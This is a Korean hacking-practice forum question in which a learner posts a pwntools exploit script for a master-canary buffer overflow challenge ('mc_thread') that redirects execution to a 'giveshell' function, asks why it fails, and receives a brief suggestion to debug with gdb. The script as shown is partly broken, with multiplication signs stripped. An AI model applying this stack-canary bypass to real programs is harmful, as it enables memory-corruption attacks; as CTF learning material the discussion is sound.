[클라우드 바우처] 80% 할인된 금액으로 드림핵 엔터프라이즈를 도입해 보세요. 자세히 알아보기
정말 모르겠어요 왜 안되는지 모르겠어요 제발 알려주세요 ㅠㅠㅠㅠㅠㅠㅠㅠ

from pwn import *
p = process('./mc_thread')
context.log_level='debug'
#p = remote('host3.dreamhack.games', 9234)
e = ELF('./mc_thread')
pay = b'A'*264
pay += b'A'16
pay += p64(e.symbols['giveshell'])
pay += b'A'
(0x948-len(pay))
pay += p64(0x4141414141414141)
pause()
p.sendlineafter('Size: ', str(len(pay)))
p.sendlineafter('Data: ', pay)

p.interactive()
페이로드에서 곱하기 기호가 왜인지는 모르겠는데 빠지더라구요 코드는 문제 없는것 같아서 오프셋 문제인것 같은데
오프셋 값이 너무 크게 나와서요.

#시스템해킹 #배경지식 #master_canary
작성자 정보
답변 1
wyv3rn
무플 방지 위원회장

오프셋값이 크게 나오는건 그럴수도 있긴합니다만... 로컬에서 되긴 되나요? gdb로 값을 하나씩 확인해보시면 답이 나올 것 같은데요

질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기